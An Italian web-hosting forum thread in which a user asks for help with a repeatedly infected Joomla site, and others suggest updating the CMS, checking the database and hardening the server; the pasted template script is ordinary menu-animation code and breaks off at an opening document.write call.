OVH Community, your new community space.

Spazio Web Infetto-Urgent!


axelgenus
30.05.2010, 14.12
Solitamente sfruttano bug nei CMS o nei servizi per accedere al sito quindi è ovvio che non trovi niente nei log. Aggiornate sempre i CMS e prendete precauzioni: mod_security su apache, kernel grsec e, nel caso, SeLinux o AppArmor.

ciberdany
22.05.2010, 15.33
SUccesso anche a me diverse volte ma non con joomla, sul dedicato, mi trovo il sito irraggiungibile e l'html della homepage provvisoria statica modificato, e ancora non ho capito come sia possibile, ora è un pò che non mi succede tralaltro non trovavo neanche violazioni nella connsessione ftp o similari boh, sfruttavano qualche strano bug e riuscivano ad aggiungere codice all'html, tralaltro per l'ftp uso password complicatissime da 12 caratteri con simboli, quindi boooh !

gio0101
22.05.2010, 08.59
Citazione Originariamente Scritto da vhs
proteggi l'area administrato di joomla con htpassword ...
è inutile
allora aggiorna la versione di joomla stessa cosa successa pure a me con :: un altro hosting ::

vhs
22.05.2010, 00.11
proteggi l'area administrato di joomla con htpassword ...

TecnoBoy
21.05.2010, 21.33
Prova a cercare quell'indirizzo lì NEL CONTENUTO di ciascun file che è nel tuo HDD....da qualche parte quel codice deve venir fuori!

generalecarson
21.05.2010, 18.38
Citazione Originariamente Scritto da tmit
Sito? NIC-HANDLE? Maggiori informazioni?
Ok ecco i dati NIC-handle cf14739-ovh Sito web qui ma vuoto http://fwd4.me/PDa
Per le maggiori informazioni dico solo che i files si infettano solo quando sono online.

tmit
21.05.2010, 18.30
Sito? NIC-HANDLE? Maggiori informazioni?

generalecarson
21.05.2010, 18.26
Citazione Originariamente Scritto da yak983
hai controllato anche il database?
Ciao
Il Database é vuoto e per sicurezza ne ho'creato un'altro con nome diverso.

yak983
21.05.2010, 18.10
hai controllato anche il database?

generalecarson
21.05.2010, 17.49
Salve
Scusate x il titolo ma non mi veniva altro come idea!
Cerco di essere + semplice possibile (nn ho'esperienza).
Allora il mio Pc é pulitissimo e non contiene nessun malware,troyan etc etc..
>Trasferisco le cartelle joomla con filezilla..>Configuro il tutto..Ma dopo un po'mi cominciano ad apparire strani errori,e il sito viene segnalato come malevolo da vari browser> Ho riscaricato sul pc,tutto il contenuto di joomla,e l'antivirus mi rileva un Backdoor..Ecco cosa appare ad esempio neigli javascripts del template>>
window.addEvent("domready",function(){var b=$$(".moduletable_menu li a");new SmoothScroll({duration:500,transition:Fx.Transitio ns.linear},window);b.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent( "mouseenter",function(){e.start({"padding-left":22})});d.addEvent("mouseleave",function(){e. start({"padding-left":16})})});var c=$$(".moduletable_menu li li a");c.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent( "mouseenter",function(){e.start({"padding-left":42})});d.addEvent("mouseleave",function(){e. start({"padding-left":32})})});var a=new Tips($$(".toolTips"),{initialize:function(){this.f x=new Fx.Style(this.toolTip,"opacity",{duration:500,wait :false}).set(0)},onShow:function(d){this.fx.start( 1)},onHide:function(d){this.fx.start(0)}})});
document.write('